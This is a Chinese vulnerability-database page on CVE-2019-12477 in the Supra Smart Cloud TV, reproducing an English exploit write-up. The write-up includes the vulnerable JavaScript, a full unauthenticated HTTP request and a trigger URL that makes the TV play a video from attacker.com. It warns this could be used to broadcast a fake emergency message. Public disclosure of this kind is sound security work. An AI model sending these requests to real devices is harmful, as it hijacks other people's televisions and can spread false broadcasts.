Zoran Supra Smart Cloud TV 路径遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1632412 漏洞类型 路径遍历
发布时间 2019-06-06 更新时间 2019-06-12
CVE编号 CVE-2019-12477 CNNVD-ID CNNVD-201906-294
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019060041
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201906-294
|漏洞详情
Zoran Supra Smart Cloud TV是美国卓然(Zoran)公司的一款智能电视。 Zoran Supra Smart Cloud TV中的‘openLiveURL’函数存在安全漏洞。本地攻击者可借助/remote/media_control?action=setUri&uri= URI利用该漏洞未经身份验证广播虚假视频。
|漏洞EXP
# Exploit Title: Remote file inclusion
# Date: 03-06-2019
# Exploit Author: Dhiraj Mishra
# Vendor Homepage: https://supra.ru
# Software Link: https://supra.ru/catalog/televizory/televizor_supra_stv_lc40lt0020f/
# CVE: CVE-2019-12477
# References:
# https://nvd.nist.gov/vuln/detail/CVE-2019-12477
# https://www.inputzero.io/2019/06/hacking-smart-tv.html

Summary:
Supra Smart Cloud TV allows remote file inclusion in the openLiveURL
function, which allows a local attacker to broadcast fake video without any
authentication via a /remote/media_control?action=setUri&uri=URI

Technical Observation:
We are abusing `openLiveURL()` which allows a local attacker to broadcast
video on supra smart cloud TV. I found this vulnerability initially by
source code review and then by crawling the application and reading every
request helped me to trigger this vulnerability.

Vulnerable code:

     function openLiveTV(url)
      {
      $.get("/remote/media_control",
{m_action:'setUri',m_uri:url,m_type:'video/*'},
       function (data, textStatus){
       if("success"==textStatus){
        alert(textStatus);
       }else
       {
        alert(textStatus);
       }
      });
      }

Vulnerable request:

    GET /remote/media_control?action=setUri&uri=
http://attacker.com/fake_broadcast_message.m3u8 HTTP/1.1
    Host: 192.168.1.155
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0)
Gecko/20100101 Firefox/66.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1

To trigger the vulnerability you can send a crafted request to the URL,

http://192.168.1.155/remote/media_control?action=setUri&uri=http://attacker.com/fake_broadcast_message.m3u8

Although the above mention URL takes (.m3u8) format based video. We can use
`curl -v -X GET` to send such request, typically this is an unauth remote
file inclusion. An attacker could broadcast any video without any
authentication, the worst case attacker could leverage this vulnerability
to broadcast a fake emergency message.
|参考资料

来源:drive.google.com

链接:https://drive.google.com/file/d/1ZVHn_bPE-3kqYd2D-3AJpXZdd4dlmzVh/view?usp=sharing


来源:packetstormsecurity.com

链接:http://packetstormsecurity.com/files/153191/Supra-Smart-Cloud-TV-Remote-File-Inclusion.html


来源:nvd.nist.gov

链接:https://nvd.nist.gov/vuln/detail/CVE-2019-12477


来源:www.exploit-db.com

链接:https://www.exploit-db.com/exploits/46971